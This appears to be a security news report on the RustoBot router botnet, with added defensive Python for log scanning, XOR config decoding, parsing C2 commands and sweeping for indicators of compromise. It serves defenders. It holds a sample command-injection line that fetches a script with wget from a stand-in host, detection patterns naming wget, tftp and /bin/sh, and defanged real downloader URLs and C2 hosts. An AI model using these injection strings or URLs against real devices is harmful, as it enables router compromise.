Wednesday, May 7, 2025

New Rust-Based Botnet Hijacks Routers to Inject Remote Commands


A new malware named “RustoBot” has been discovered exploiting vulnerabilities in various router models to gain unauthorized access and initiate Distributed Denial of Service (DDoS) attacks.

This advanced cyber-threat, first observed between January and February 2025, targets TOTOLINK and DrayTek devices and uses techniques not seen in previously known malware.

Exploitation and Spread Strategy

The botnet leverages multiple command injection vulnerabilities, primarily residing in TOTOLINK’s cstecgi.cgi script and DrayTek’s cgi-bin/mainfunction.cgi/apmcfgupload interface.


These vulnerabilities allow attackers to run arbitrary system commands remotely.

RustoBot uses several downloader scripts utilizing common commands like wget and tftp to propagate itself across devices with different architectures, including arm5, arm6, arm7, mips, mpsl, and x86.
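The two endpoints named above are the surfaces an infected device is reached through, so web access logs from routers (or from a reverse proxy in front of them) are the first place a defender can look for exploitation attempts. The following Python is an added example, not code from the article or from FortiGuard Labs: it matches requests to cstecgi.cgi and mainfunction.cgi/apmcfgupload whose URL carries shell-injection hints or the wget/tftp downloader commands the article mentions. The "/cgi-bin/" prefix, the heuristic pattern list and the sample log lines are all this example's own assumptions.

```python
import re
from typing import Dict, List, Optional

# Endpoints the article names as the abused command-injection surfaces.
# Substring matching keeps the check independent of the exact directory
# the script lives under (the "/cgi-bin/" prefix used below is an assumption).
WATCHED_ENDPOINTS: Dict[str, str] = {
    "cstecgi.cgi": "TOTOLINK",
    "mainfunction.cgi/apmcfgupload": "DrayTek",
}

# Constructed heuristic for shell-injection payloads: command separators and
# substitutions (raw or URL-encoded) plus the downloader commands the article
# names (wget, tftp). Tune for your environment; this is not a vendor signature.
INJECTION_HINTS = re.compile(
    r"(%3B|;|%7C|\||%60|`|%24%28|\$\(|%0A|%0D|\bwget\b|\btftp\b|/bin/sh)",
    re.IGNORECASE,
)

# Apache/nginx "combined"-style access-log prefix.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(line: str) -> Optional[dict]:
    """Return an alert for a request that hits a watched endpoint with an
    injection-looking payload anywhere in the request URL; None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    route, _, _query = path.partition("?")
    for needle, vendor in WATCHED_ENDPOINTS.items():
        if needle in route and INJECTION_HINTS.search(path):
            return {
                "src": m.group("ip"),
                "ts": m.group("ts"),
                "vendor": vendor,
                "endpoint": needle,
                "status": int(m.group("status")),
                "path": path,
            }
    return None


def scan(lines: List[str]) -> List[dict]:
    """Run classify() over a log and keep only the alerts."""
    return [alert for alert in map(classify, lines) if alert]


# Constructed sample access-log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Feb/2025:03:14:07 +0000] "GET /cgi-bin/cstecgi.cgi?action=%3Bwget%20http://198.51.100.7/w.sh HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Feb/2025:03:15:01 +0000] "GET /cgi-bin/cstecgi.cgi?action=getStatus HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Feb/2025:03:15:22 +0000] "POST /cgi-bin/mainfunction.cgi/apmcfgupload?session=%60tftp%60 HTTP/1.1" 200 0 "-" "curl/8.0"',
    '192.0.2.44 - - [10/Feb/2025:03:16:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f'{a["ts"]} {a["src"]} -> {a["vendor"]} {a["endpoint"]}: {a["path"]}')
```

Access logs record only the request line, so a payload carried in a POST body is invisible to this check; for that you need a WAF, an IPS signature, or full packet capture in front of the device. A 200 response to a flagged request is worth treating as a probable compromise rather than a blocked attempt.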

Figure: RustoBot entry point

Upon infection, RustoBot obfuscates its configuration with XOR encoding, deriving the keys needed to decode the ciphertext through a series of calculations.

This approach helps the malware evade detection by standard security systems.

Once decoded, the configuration assists in resolving command and control (C2) server domains and executing DDoS attacks.

The malware’s entry point, identified through reverse engineering, demonstrates a high level of sophistication, using system API offsets to perform its malicious behaviors.

Figure: Decoder key
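XOR obfuscation of this kind hides the C2 domains from a naive strings scan but does not survive analysis: once an analyst knows a few bytes of the plaintext, the repeating key falls out directly. The following Python is an added example, not the malware's scheme or code from the article, and it deliberately ignores the key-derivation calculations the article describes; it shows the known-plaintext recovery an analyst would apply to a dumped config blob. The sample key, the "key:value|key:value" layout and the blob are constructed here; the hostnames in the sample come from the article's IOC table, and the ".anondns.net" suffix they share is used as the crib.

```python
from itertools import cycle
from typing import Dict, Optional, Tuple


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key is the identity."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(ciphertext: bytes, crib: bytes, max_key_len: int = 16) -> Optional[Tuple[bytes, bytes]]:
    """Known-plaintext recovery of a repeating XOR key.

    For each candidate key length, slide the crib over the ciphertext; a
    position is accepted only if every key byte it implies is consistent
    and the full decode is printable ASCII. Returns (key, plaintext) or None.
    """
    for key_len in range(1, max_key_len + 1):
        if len(crib) < key_len:
            break  # the crib can no longer constrain every key byte
        for off in range(len(ciphertext) - len(crib) + 1):
            key = [None] * key_len
            consistent = True
            for i, c in enumerate(crib):
                pos = (off + i) % key_len
                k = ciphertext[off + i] ^ c
                if key[pos] is None:
                    key[pos] = k
                elif key[pos] != k:
                    consistent = False
                    break
            if not consistent:
                continue
            candidate = bytes(key)
            plaintext = xor_bytes(ciphertext, candidate)
            if all(32 <= b < 127 for b in plaintext):
                return candidate, plaintext
    return None


def parse_config(plaintext: bytes) -> Dict[str, str]:
    """Parse the constructed 'key:value|key:value' layout used by the sample."""
    return dict(field.split(":", 1) for field in plaintext.decode("ascii").split("|"))


# Constructed sample: a config blob protected with a 4-byte repeating XOR key.
# Key and layout are this example's own; the hosts come from the IOC table.
SAMPLE_KEY = bytes.fromhex("5a13772e")
SAMPLE_PLAINTEXT = b"c2:rustbot.anondns.net|alt:techsupport.anondns.net"
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)

# Crib: the dynamic-DNS suffix shared by every C2 host in the article's IOC table.
CRIB = b".anondns.net"


def recover_c2_hosts(blob: bytes = SAMPLE_BLOB, crib: bytes = CRIB) -> Dict[str, str]:
    """Recover the key from the blob and return the decoded config fields."""
    hit = recover_key(blob, crib)
    if hit is None:
        return {}
    _, plaintext = hit
    return parse_config(plaintext)


if __name__ == "__main__":
    key, pt = recover_key(SAMPLE_BLOB, CRIB)
    print("key:", key.hex(), "config:", pt.decode("ascii"))
```

The printable-ASCII check is what rejects spurious offsets; for a binary config you would replace it with a structural check (a known magic value, a length field that matches the blob). The takeaway for detection is that obfuscated configs are a reason to write YARA rules on the decoder routine or on decoded memory, not on the stored strings.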

DDoS Capabilities and Command Structure

RustoBot supports a variety of DDoS attack methods, including Raw IP, TCP, and UDP flooding.

It receives attack parameters from the C2 server, initiating attacks based on predefined commands.

For example, the 0x03 command triggers a UDP flood attack, specifying victim IP addresses, port numbers, attack duration, and packet lengths.

This structured command system enables attackers to coordinate significant disruptions with precision.
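Because the attack parameters arrive as a fixed set of fields, captured C2 traffic can be decoded into victim, port and duration, which is what an incident responder needs to notify the target and block egress. The following Python is an added example, not the botnet's real protocol or code from the article: it parses a constructed 11-byte layout (opcode, victim IPv4, port, duration, packet length, network byte order) that is only an assumption built from the fields the article lists for the 0x03 UDP-flood command. Only 0x03 is mapped, since the article gives no opcodes for the Raw IP and TCP methods; everything else is reported as unknown.

```python
import struct
from dataclasses import dataclass
from ipaddress import IPv4Address
from typing import Dict, List

# Opcode named in the article. The Raw IP and TCP flood opcodes are not given
# there, so only 0x03 is mapped; any other value is treated as unknown.
KNOWN_COMMANDS: Dict[int, str] = {0x03: "udp_flood"}

# Assumed wire layout (network byte order), built from the fields the article
# lists for the UDP-flood command; the real format is not documented here:
#   opcode(1) | victim IPv4(4) | port(2) | duration_s(2) | packet_len(2)
CMD_STRUCT = struct.Struct("!B4sHHH")


@dataclass(frozen=True)
class AttackCommand:
    opcode: int
    name: str
    target: IPv4Address
    port: int
    duration_s: int
    packet_len: int


def parse_command(payload: bytes) -> AttackCommand:
    """Decode one fixed-size command; raise ValueError on short or unknown input."""
    if len(payload) < CMD_STRUCT.size:
        raise ValueError(f"short command: {len(payload)} bytes, need {CMD_STRUCT.size}")
    opcode, ip_raw, port, duration, pkt_len = CMD_STRUCT.unpack_from(payload)
    if opcode not in KNOWN_COMMANDS:
        raise ValueError(f"unknown opcode 0x{opcode:02x}")
    return AttackCommand(opcode, KNOWN_COMMANDS[opcode], IPv4Address(ip_raw), port, duration, pkt_len)


def parse_stream(data: bytes) -> List[AttackCommand]:
    """Split a captured C2 stream into fixed-size commands, skipping unknown ones."""
    cmds = []
    for off in range(0, len(data) - CMD_STRUCT.size + 1, CMD_STRUCT.size):
        try:
            cmds.append(parse_command(data[off:off + CMD_STRUCT.size]))
        except ValueError:
            continue
    return cmds


def targets_to_block(cmds: List[AttackCommand]) -> List[str]:
    """Distinct victim 'ip:port' pairs, for hand-off to egress filtering."""
    return sorted({f"{c.target}:{c.port}" for c in cmds})


# Constructed sample stream: a UDP flood order against 192.0.2.7:53 for 60 s
# with 512-byte packets, followed by an opcode this parser does not know.
SAMPLE_STREAM = bytes.fromhex("03c00002070035003c0200") + bytes.fromhex("ff00000000000000000000")

if __name__ == "__main__":
    for cmd in parse_stream(SAMPLE_STREAM):
        print(cmd)
    print("block:", targets_to_block(SAMPLE_STREAM and parse_stream(SAMPLE_STREAM)))
```

When the real layout is recovered from a sample, only CMD_STRUCT and KNOWN_COMMANDS need to change; the stream splitter and the block-list hand-off stay the same. Unknown opcodes are skipped rather than failing the whole capture so that one unrecognised command does not hide the decodable ones around it.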

The malware campaigns were observed in Japan, Taiwan, Vietnam, and Mexico, targeting the technology sector.

The attacks not only compromise the security of the affected devices but also pose a significant risk to the operational integrity of businesses relying on these internet gateways.

To combat this threat, FortiGuard Labs has integrated multiple protective measures into its security solutions, including:

  • Antivirus Services: FortiGuard Antivirus detects and blocks RustoBot under signatures like BASH/Mirai.AEH!tr.dldr and ELF/Mirai variations.
  • Web Filtering: Blocks the C2 server connections.
  • IPS Signatures: Offers protection against vulnerabilities exploited by RustoBot.

According to the report, Fortinet advises organizations to strengthen endpoint monitoring and authentication, and suggests training through its Fortinet Certified Fundamentals (FCF) in Cybersecurity program.

This comprehensive approach by FortiGuard Labs ensures a robust defense against the emerging threat of RustoBot, urging all stakeholders in the cybersecurity community to remain vigilant and proactive.

Table of Indicators of Compromise (IOCs)

Type        Value
URL         hxxp://66[.]63[.]187[.]69/w.sh
URL         hxxp://66[.]63[.]187[.]69/wget.sh
URL         hxxp://66[.]63[.]187[.]69/tftp.sh
Host        dvrhelper[.]anondns[.]net, techsupport[.]anondns[.]net, rustbot[.]anondns[.]net
IP          5[.]255[.]125[.]150
File Hash   76a487a46cfeb94eb5a6290ceffabb923c35befe71a1a3b7b7d67341a40bc454, 75d031e8faaf3aa0e9cafd5ef0fd7de1a2a80aaa245a9e92bae6433a17f48385, …
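The indicators above are published defanged (hxxp, [.]) so they cannot be clicked by accident; before they can be matched against DNS, proxy, firewall or EDR logs they have to be refanged and compiled into patterns that do not misfire on longer addresses. The following Python is an added example, not code from the article or from Fortinet: it refangs the table's indicators (the two hashes given in full; the elided ones are left out), then sweeps constructed DNS, proxy, firewall and EDR log lines for hits. The log formats are this example's own assumptions.

```python
import re
from typing import Dict, List, Tuple

# Indicators from the article's IOC table, kept defanged as published.
IOCS_DEFANGED: Dict[str, List[str]] = {
    "url": [
        "hxxp://66[.]63[.]187[.]69/w.sh",
        "hxxp://66[.]63[.]187[.]69/wget.sh",
        "hxxp://66[.]63[.]187[.]69/tftp.sh",
    ],
    "host": ["dvrhelper[.]anondns[.]net", "techsupport[.]anondns[.]net", "rustbot[.]anondns[.]net"],
    "ip": ["5[.]255[.]125[.]150"],
    "sha256": [
        "76a487a46cfeb94eb5a6290ceffabb923c35befe71a1a3b7b7d67341a40bc454",
        "75d031e8faaf3aa0e9cafd5ef0fd7de1a2a80aaa245a9e92bae6433a17f48385",
    ],
}


def refang(value: str) -> str:
    """Undo the usual defanging: hxxp -> http, [.] -> ., [:] -> :, [@] -> @."""
    v = value.strip()
    v = re.sub(r"(?i)^hxxp", "http", v)
    return v.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":").replace("[@]", "@")


def compile_iocs(defanged: Dict[str, List[str]]) -> List[Tuple[str, str, "re.Pattern"]]:
    """Refang every indicator and build a case-insensitive pattern for it.

    Hosts, IPs and hashes are anchored so that 5.255.125.150 does not match
    15.255.125.150 or 5.255.125.1500; a trailing dot (DNS log style) is allowed.
    URLs are matched as plain substrings."""
    compiled = []
    for kind, values in defanged.items():
        for value in values:
            plain = refang(value)
            esc = re.escape(plain.lower())
            if kind in ("host", "ip", "sha256"):
                pat = re.compile(r"(?<![\w.-])" + esc + r"(?![\w-])")
            else:
                pat = re.compile(esc)
            compiled.append((kind, plain, pat))
    return compiled


def scan_logs(lines: List[str], defanged: Dict[str, List[str]] = IOCS_DEFANGED) -> List[dict]:
    """Return one hit record per (line, indicator) pair found."""
    iocs = compile_iocs(defanged)
    hits = []
    for n, line in enumerate(lines, 1):
        low = line.lower()
        for kind, plain, pat in iocs:
            if pat.search(low):
                hits.append({"line": n, "type": kind, "indicator": plain})
    return hits


# Constructed sample log lines from four different sources.
SAMPLE_LOGS = [
    "2025-02-12T09:10:11Z dns client=10.0.0.23 query=rustbot.anondns.net. type=A",
    "2025-02-12T09:10:13Z proxy client=10.0.0.23 GET http://66.63.187.69/wget.sh status=200 ua=Wget",
    "2025-02-12T09:10:20Z fw src=10.0.0.23 dst=5.255.125.150 dport=443 action=allow",
    "2025-02-12T09:11:00Z dns client=10.0.0.40 query=updates.example.net. type=A",
    "2025-02-12T09:12:00Z edr host=cam-gw-1 file=/tmp/x sha256=76a487a46cfeb94eb5a6290ceffabb923c35befe71a1a3b7b7d67341a40bc454",
]

if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(hit)
```

Three of the five sample lines come from the same internal client, which is the pattern to look for: a DNS lookup of a C2 host, a fetch of a downloader script and a connection to the listed IP in sequence is a much stronger signal than any single indicator, and the client address is the device to pull off the network.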


Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
